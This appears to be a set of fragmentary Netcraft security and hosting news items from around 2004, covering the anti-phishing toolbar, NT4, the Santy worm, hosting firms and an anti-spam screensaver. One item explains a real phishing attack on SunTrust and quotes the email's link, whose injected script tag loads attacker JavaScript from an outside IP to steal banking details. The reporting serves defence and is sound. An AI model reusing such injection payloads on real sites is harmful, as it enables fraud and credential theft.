Filtering of some suspicious characters was too aggressive and actually blocked some urls on benign sites including Google and Amazon. We have made an update to the toolbar which will propagate during the course of today.

Thanks for all the reports of phishing sites. If you would like to evangelize the toolbar, encourage friends and relatives that you think might be vulnerable to phishing attacks to use the Toolbar, so that that maximum number of people receive the benefit of these timely reports.

If your preferred desktop operating system can’t run the Toolbar until a Firefox version is available, you can report phishing sites directly http://toolbar.netcraft.com/report_url

Anandtech and Wininformant quickly published reviews of the toolbar yesterday, here and here. There was also some television coverage in the US.

Everyone here is delighted by your enthusiasm and encouragement.

Installing the Netcraft Toolbar

Downloading and installing the Netcraft Toolbar is quick and simple:

1. Follow this link to download the toolbar.
2. When you see a prompt asking if you want to open the file or save it to your computer, press the "Open" button.
3. The Netcraft Toolbar Setup Wizard will now appear. Follow the on-screen prompts to install the toolbar.
4. Open Internet Explorer and click the right-hand mouse button over the toolbar area.
5. In the menu that appears, ensure that there is a tick next to the 'Netcraft Toolbar' item. If there is not, click the left-hand mouse button over the item and the toolbar should appear.
   
   

Using the Toolbar Effectively

The Netcraft Toolbar provides you with constantly updated information about the sites you visit as well as blocking dangerous sites

• Once the toolbar is installed, Internet Explorer should look similar to this:
  
  
• As you can see, the site used in this example is http://toolbar.netcraft.com.
• When you visit a site, the following information will be displayed in the toolbar (unless the page has been blocked, like this one):
  
  
• The "rank" (popularity amongst toolbar users) of the site, linking to the top site listings.
• A link to the site report for the current site.
• The flag (if available) and the two-letter ISO code for the country in which the site is hosted; in this case it is hosted in  [UK] (United Kingdom).
• The name of the netblock on which the site is hosted (in this case, the Rackspace.com Netblock). This also links to a listing of sites on the same netblock.
• If you attempt to visit a page that has been blocked, you will see a warning dialog which looks similar to this:
  
  

Getting the Most from the Netcraft Toolbar

• The toolbar provides you with a wealth of information about the sites you visit. This information will help you make an informed choice about the integrity of those sites. Here is a brief list of points you should be aware of when visiting a site which requires you to enter personal information of any kind:
  
  
  • Look at the toolbar to see whether the site's netblock is registered to the company you expect.
  • Look at the country code and flag on the Toolbar to check that the site is hosted in the country that you expect. There is a list of countries which are often used to host fraud sites here.
  • Request a site report on the site:
    
    
  
  
  
  • Who is the site's domain registered to? Be suspicious if this is not the organisation you expect.
  • Who is running the DNS and reverse DNS for the site? Be suspicious if these are not run by a host in a domain controlled by the organisation.
  • How new is the site? All other things being equal, the longer a site has been around, the more you can trust it. "New Site" means the site you are currently visiting has not been seen before by the Netcraft Web Server Survey. This indicates that the site is probably less than one month old. Phishing sites spring up overnight and disappear just as quickly, and you should be extremely suspicious if you see this when visiting what you believe to be a trustworthy site.
  • Does it have an SSL Certificate? Bank sites that take authentication details will do this over SSL. Details of the SSL Certificate (if any) will appear in the site report.
  • Is the site in the DNS? If the site has no hostname or domain name and is a raw IP address be very suspicious.
  • If you are convinced that the site is a phishing site, please report it. If you are unable to report the URL via the toolbar site, please send us the entire mail message intact as an attachment. If you use Outlook you can do this by composing a new mail to toolbar@netcraft.com and dragging the fraud mail on to it as an attachment.
  • Netcraft will send a reward to the first person to report each new phishing site.
• Let's take a look at an example. Below is a phishing attack aimed at customers of SunTrust Banks which we received.
  
  
  
  Note that the Toolbar shows that the site is hosted in the USA, at "Inktomi Corporation", and that the site is new. The real SunTrust web site is hosted in the USA at SunTrust Service Corporation.
  
  
  
  Comparing the site reports is also telling; the fraudulent site's report contains many 'unknowns' whereas the site report for the real SunTrust web site shows plausible domain registration and DNS details.
  
  You can find out more about reporting URLs in the tutorial on reporting a suspicious URL.

Reporting a Suspicious URL

When you visit a page that you believe to be a phishing site, or contains fraudulent or deceptive content, we ask that you report it so that other toolbar users will benefit from your vigilance. The more sites that are reported, the more useful the toolbar will become for everyone.

• You can report a URL by clicking on "Report a Phishing Site" in the toolbar menu, accessed by clicking on the Netcraft logo:
  
  
  
  After you report a URL, Netcraft analysts will examine the report and block the page if they find it has inappropriate content.
• You can practice blocking an attack by:
  
  
  1. Requesting a sample of a fictional phishing attack mail.
  2. Visiting the URL contained in the mail that you receive.
  3. Click on the Netcraft logo in the toolbar.
  4. Select "Report a Phishing Site" in the menu that appears.
  5. URLs from fictional phishing attack mails will be blocked automatically.
  6. You can test that the URL has been blocked by re-visiting it after reporting.

It also mobilizes the Netcraft community into a giant neighbourhood watch scheme to empower the most alert and experienced members to protect the vulnerable against fraud and phishing attacks.

Toolbar features include:

• Clear display of sites' hosting location at all times helps you validate fraudulent urls (e.g. the main online banking site of a large US bank is unlikely to be hosted in the former Soviet Union).
• Once you report a phishing URL, it is blocked for other community members subsequently accessing it. The leverage of widely disseminated attacks (people constructing phishing attacks send literally millions of electronic mails in the expectation that some will reach customers of the bank) is utilized to expedite blocking of the fraud site.
• Natively traps cross site scripting and other suspicious urls containing characters which have no common purpose other than to deceive.
• Netcraft supervisor validation is used to contain the impact of any false reporting of urls.
• Display of browser navigational controls (toolbar & address bar) in all windows, to defend against pop up windows which attempt to hide the navigational controls to disguise location.
• Happily coexists with Google and other Toolbars.

The Netcraft Toolbar is available now. Please download and try out the toolbar, and let us have your opinions.

If you would like to have a version of the Netcraft Toolbar branded for your organisation, please get in touch. The toolbar can be used to keep your site navigation within view of your customers throughout the time they spend using the web. Dynamically updating navigation provides the facility to change urls or menu structure and bring & new and temporal information to customers' attention at any time.

Microsoft has retired NT4, which was introduced in September 1996, and will cease security updates on Dec. 31, along with pay-per-incident support. Microsoft recently said it will offer only custom support on to users of Windows NT 4.0 Server after Jan. 1. As a result, the number of holdouts running web sites on NT4 has been dwindling. Only 1.4 percent of web-facing hostnames run on Windows NT4/98, according to this month's Web Server Survey, down from 5.3 percent at the start of 2003.

Retail chain Kroger was the last remaining Fortune 100 company on Windows NT4, but is now serving its site on Windows Server 2003 (IIS6) while using NetBSD for front-end caching or load balancing.

The UK's FTSE 100 is not as far along, with six member companies still using NT4, following retailer Next PLC's Christmas Eve upgrade to Windows Server 2003. While Britain's banks have urged customers to update their computers, several large financial firms (including Lloyds TSB, Legal & General and F&C Asset Management) continue to run their public web sites on Windows NT4. Other FTSE 100 firms continuing to use NT4 include Tomkins, Allied Dome and BB&G.

Another NT4 user is Diebold, the security firm whose systems are widely used in bank cash machines and electronic voting.

Netcraft monitors over 23K hostnames for the top 1.5K Enterprises (Fortune 1K, FT European 500, FT Asia Pacific, FT Japan, FT Eastern Europe) on a monthly basis, providing details of web technology. Contact us for details of the commercial dataset.

The Santy worm is written in Perl, and exploits a flaw in a file called viewtopic.php that allows an SQL injection exploit, in which SQL database commands typed into a web form can be executed. The worm defaces the web site with the phrase "This site is defaced!!! NeverEver NoSanity" and then seeks out other phpBB sites to attack, apparently using Google to locate the target viewtopic.php files. A Google search for the file currently returns more than 4 million results, while an MSN search lists more than 37,000 appearances of the defacement. Internet security firms are issuing public requests for Google to block these searches to limit the spread of the worm.

Go Daddy has experienced explosive growth in 2004, ending the year with 2.9 million web-facing hostnames, as measured by our Hosting Provider Switching Analysis. It also expanded aggressively into shared hosting and SSL certificates. But its leadership in the domain business hasn't given the Scottsdale, Ariz. provider the name recognition of Yahoo or Interland, two of its chief competitors in the small business hosting market.

"We have the best value proposition of any registrar ... We didn't understand why everybody doesn't do business with us," Go Daddy CEO Bob Parsons told Clickz.com. "We commissioned some market research six months ago, took a hard look at people who aren't doing business with us, and concluded that they aren't aware of us. So what better way to enter (an awareness campaign) than to use the Super Bowl?"

The phpBB development team has notified users of the exploit, which was published on the BugTraq mailing list and several web sites. "This is not a phpBB exploit or problem, it's a PHP issue and thus can affect any PHP script which uses the noted functions," the phpBB advisory said, urging users and hosting providers to upgrade their PHP installations. Similar advice is being offered by the PHP project site, which has fixed the bugs in versions 4.3.10 and 5.0.3.

PHP, an open source server-side scripting language, is widely used to power web applications that connect with databases such as MySQL, and is commonly bunded with shared hosting accounts offered by web hosting providers. phpBB is among the web's most popular bulletin board programs, with more than 156,000 registered members of its user forum.

The server load issues have affected "a number of web hosts," according to Six Apart's Jay Allen, and are "especially evident in shared hosting environments." Allen said the problems are tied to two bugs that cause Movable Type to rebuild posts even when no pages are being changed, allowing comment spam attacks to tie up server resources. Six Apart is promising a fix within 48 hours.

Comment spam, also known as link spam, is believed to boost a site's ranking in Google, which uses inbound links as a measure of a site's popularity. Spammers are using automated scripts to bombard weblogs with comments that include links to sites offering prescription drugs or porn. While weblogs on all platforms have been affected, Movable Type and its mt-comments.cgi script have become a particular target.

The CIRA warned .ca domain owners about the scam, which sends emails orginating from the address complaince@cira.cc, rather than the group's official compliance email address, compliance at cira.ca. The use of such "look-alike" domains has become common in phishing scams targeting financial institutions. The scam email says the CIRA is "exercising our right to verify the registrant information." This tactic mimics legitimate emails sent in recent weeks by numerous registrars, who sought to verify account information ahead of an ICANN rule change.

Notably, the five hosting providers that gained more than 100K active sites during 2004 did so entirely through organic growth, rather than acquisitions. Leading the pack was German giant 1&1 Internet, which expanded into the American market even as it continued to gain customers in Europe. Next is The Planet, which experienced a huge year as it found a product positioning sweet spot with its customizable menus of managed services atop dedicated servers.

The Teles hosting brands, which we group under Tect AG for measurement purposes, house more than 1.1 million active sites and 2.2 million hostnames. Freenet said it was particularly interested in Tect's success in dedicated hosting, one of the fastest-growing and most profitable sectors of the hosting business. Tect added 1,383 servers in the six-month period between April and October, growing 45 percent in that period, according to our Hosting Provider Server Count.

The cost of a security lapse goes beyond the direct financial losses and the "headline risk" of adverse publicity, as regulators and lawmakers are paying attention as well. "As phishing attacks are indeed a potential risk, regulators examine the processes used to combat such attacks to determine if they are appropriate to the risk," said Robert Wicksell of the U.S. Office of the Comptroller of the Currency (OCC), who said banking regulators are "highly focused on this issue."

A key question is whether financial sites' defenses are adequate against known threats such as cross-site scripting, the technique used to exploit the SunTrust site. A similar weakness was found in the Bank One web site on Thursday. The incidents come five months after numerous e-commerce sites were proven vulnerable to cross-site scripting attacks by an online demo that inserted content into the web sites of MasterCard and Barclays, among others.

Yahoo has slashed its domain name pricing to $4.98 a year through Dec. 31, continuing a pricing war among major hosting companies. The aggressive move comes just just four months after Yahoo dropped its price to $9.95 a year as part of a major push to expand its share of the shared hosting market.

The new pricing undercuts previous leader 1&1 Internet by nearly a dollar. While 1&1 operates its own ICANN-accredited registry, Yahoo continues to operate as a reseller for Melbourne IT, the Australian domain name registry that focuses on the wholesale market. While it's not known precisely what Yahoo is paying per domain, few registrars offer domains to resellers at prices below $6.50 per domain. Since it is likely selling at a loss, Yahoo has limited the offer to one domain per customer, preventing arbitrage-related bulk purchases by owners of large domain portfolios.

Yahoo's move may be a response to Interland, a major competitor in the small business hosting market, which last month lowered its domain name pricing to $7.95 a year, and was immediately rewarded with a one-month gain of 132K hostnames.

While response times have been improved since moving to FreeBSD, www.georgewbush.com is simply redirecting visitors to the Republican National Committee web site at www.gop.com; however, making an HTTP 1.0 request to www.georgewbush.com causes it to serve the "Test Page for Apache Installation" instead of instructing the browser to redirect to www.gop.com.

www.georgewbush.com continues to block access based on geographical location. A dynamically updating chart of site performance for www.georgewbush.com is available here

Another notable change was observed on Sun Microsystems’ web site at www.sun.com, which was upgraded from Solaris 8 to Solaris 9 on Nov 30. Sun's tardy approach to running the latest version of Solaris on www.sun.com - Solaris 10 was recently released - is in sharp contrast to Microsoft, who ran www.microsoft.com on Windows 2003 for months ahead of its launch.

Yesterday should have been a day for headlines about progress in the battle against phishing scams. Instead, the news was dominated by a new threat that drove home the need for vigilance on the anti-phishing frontier.

Seeking swifter action against fast-moving phishing scams, some of the Internet's best-known service providers announced plans to share phishing attack data with one another and law enforcement agencies through Digital Phishnet. But even as this anti-phishing dream tream was being unveiled, security researchers revealed a security hole that makes it easier for phishing operations to inject content into legitimate web sites.

Secunia documented a cross-browser security flaw that is likely to be rapidly adopted by phishing operations. The technique uses a specially-crafted link to a legitimate website, which then enables the scammer to place content into pop-up windows opened during the session - including data collection forms that spoof the design of the legitimate site.

A decision by MacDailyNews to shift its web site from Mac OS X to Linux has highlighted the fact that many prominent sites for Macintosh users are hosted on either Linux or FreeBSD.

Mac enthusiast sites hosted on Linux include MacDailyNews, MacWorld and MacCentral. Running on FreeBSD are MacintoshOS, MacMinute and the entire Mac News Network group of sites, including MacSurfer, Apple Insider, Mac Observer and the MacNN main site.

Only about 60K hostnames worldwide are currently hosted on the Mac OS, and just eight hosting firms house more than 1,000 Mac-based hostnames. The largest, with 4K hostnames, is Natel.net, an ISP in Fairfield, Iowa.

This makes the fraud much more convincing than traditional phishing mails, as the url the SunTrust customer clicks on actually runs from the SunTrust site before loading JavaScript from the fraudsters server, located in Korea.

The JavaScript then changes the title of the page to "Suntrust Online Banking - Account Verification" and sets the window status to "Suntrust Online Banking", thereby preventing suspicious URLs from being displayed when the victim hovers their mouse cursor over a hyperlink. An 'iframe' is used to insert a form onto the page, which asks the customer to enter their Social Security number and SunTrust banking details. When the form is submitted, it is processed by a PHP script, allowing the attacker to capture the account details.

The phishing emails received by Netcraft contain the following HTML to create a hyperlink to the SunTrust web site:

<a
href="http://www.suntrust.com/onlinestatements/index.asp?AccountVerify=df4g6
53432fvfdsGFSg45wgSVFwfvfVDFS54v54g5F42f543ff5445wv54w&promo=%22%3E%3Cscript
+language%3Djavascript+src%3D%22http%3A%2F%2F%3211%2E1%375%2E176%2E179%2Fsun
%2Fsun%2Ejs%22%3E%3C%2FSCRIPT%3E)http://www.suntrust.com/onlinestatements/in
dex.asp?AccountVerify=df4g653432fvfdsGFSg45wgSVFwfvfVDFS54v54g5F42f543ff5445
wv54w&promo=%22%3E%3Cscript+language%3Djavascript+src%3D%22http%3A%2F%2F%321
1%2E1%375%2E176%2E179%2Fsun%2Fsun%2Ejs%22%3E%3C%2FSCRIPT%3E"
target="_blank">click here.</td></tr></table></a>

One of the parameters supplied to the page is not properly encoded when the SunTrust site displays it, which allows an attacker to inject arbitrary HTML, including JavaScript which is executed by customers' web browsers. The highlighted portion of the URL, which unneccessarily appears twice, causes the following script to be inserted into the page:

<script language=javascript src="http://211.175.176.179/sun/sun.js">
</SCRIPT>

This in turn executes the JavaScript which is responsible for altering the contents of the page.

Fraudsters have noticed opportunities in SunTrust's internet banking operations previously, and a similar attack was executed in September.

Careless application errors and inadequate testing are believed to be an industry wide problem for internet banking, and even though it would seem to the man in the street appalling that someone could run a fraud from a bank's own site, SunTrust competitors are unlikely to be strongly critical through fear of similar problems with their own facilities.

Netcraft has highlighted the threat of cross site scripting and script injection used for fraud, and provides a range of services for banks and other financial institutions to try and eliminate these kinds of errors from their systems, including comprehensive application testing and training for developers and designers of web based applications.

"Lycos has decided to close down its Make Love, Not Spam website," said spokesperson Malte Pollmann. "The aim of the campaign was to ignite a debate about anti-spam measures. We feel that we have achieved this through our activity and will now continue that debate with others in the email industry. We hope that this will lead to further new and innovative solutions to the problem of spam."

The company also says a published list of sites affected by traffic from the screensaver represented "historic data" and not ongoing activity. Netcraft used the list as a guide in analyzing the screensaver's impact, monitoring three sites which Lycos cited as being hardest hit by its campaign. Our analysis found two of the three sites cited by MakeLoveNotSpam were not available, and attributed this status to traffic generated by the screensaver. Lycos Europe says its attacks on those particular sites had already ceased.

During November all of the sites monitored experienced some failed requests, with New York Internet the most reliable site during the period, followed by Pair Networks.

Half of the top ten sites were running BSD based operating systems, with four running Linux, and hosting.com nee Express Technologies running Windows.

The site has shifted IP addresses from 83.241.136.230 to 213.115.182.123, which are both housed at the web servers of Starring, a Swedish advertising agency which is apparently working with Lycos Europe on the site.

Click for larger image.

Many users have reported problems accessing the web site since it was announced a few days ago. At first, these difficulties were thought to be as a result of the web site's success or revenge attacks by spammers. It now appears that some major Internet backbones are denying access to the IP address used to host www.MakeLoveNotSpam.com. Tracing a route to the host from Netcraft's main site in the UK reveals that access to the MakeLoveNotSpam.com site has been blackholed by Global Crossing's worldwide network, leaving the site accessible from some areas but not others:

A dynamically updating chart of site performance for MakeLoveNotSpam.com is available here.

While Internet users debate the ethics of the initiative, Lycos Europe is denying reports that the MakeLoveNotSpam site was hacked and defaced last night. An intrusion by hackers would be a serious concern for an operation that controls an army of computers with DDoS capabilities. The site has been unreachable today, which could be related to traffic from Slashdot rather than a counterattack.

Lycos Europe is offering a "screensaver that spams the spammers," using idle computer time to attack sites that have been blacklisted for abusive spamming practices. Monitoring of three of the targets housed on Chinese servers shows that two of the sites, bokwhdok.com and printmediaprofits.biz, have been knocked offline by the attack. A third target, rxmedherbals.info, has remained largely available, with intermittent outages.

In the December 2004 survey we received responses from 56,923,737 sites. The gain of 808,722 sites continues the Internet's powerful growth as a medium for communications and commerce, which has continued at near-record pace in 2004 despite a steady drumbeat of security threats.

Trends contributing to the expansion include the growth of retail e-commerce and online banking, as well as lower prices for domain names. Domain registrars and hosting companies say small businesses have been active purchasers of domains and web sites, suggesting that the Internet's benefits as a business tool have overcome fears about Internet security, which are often cited as a factor in delayed adoption of the Web by some small businesses.

In 2004 the Web has emulated the financial market model of "climbing a wall of worry," averaging 911,000 new sites a month amid a wave of security incidents. Prominent security headlines featured the MyDoom DDoS, the Witty worm, a TCP security hole, the spread of the Download.Ject exploit through web sites, a JPEG-based attack, an IFRAME exploit spread through banner ad networks (November), and a year-long surge in phishing attacks.

Trends in the web server sector continue apace, with both Apache and Microsoft gaining sites as their shares hold steady.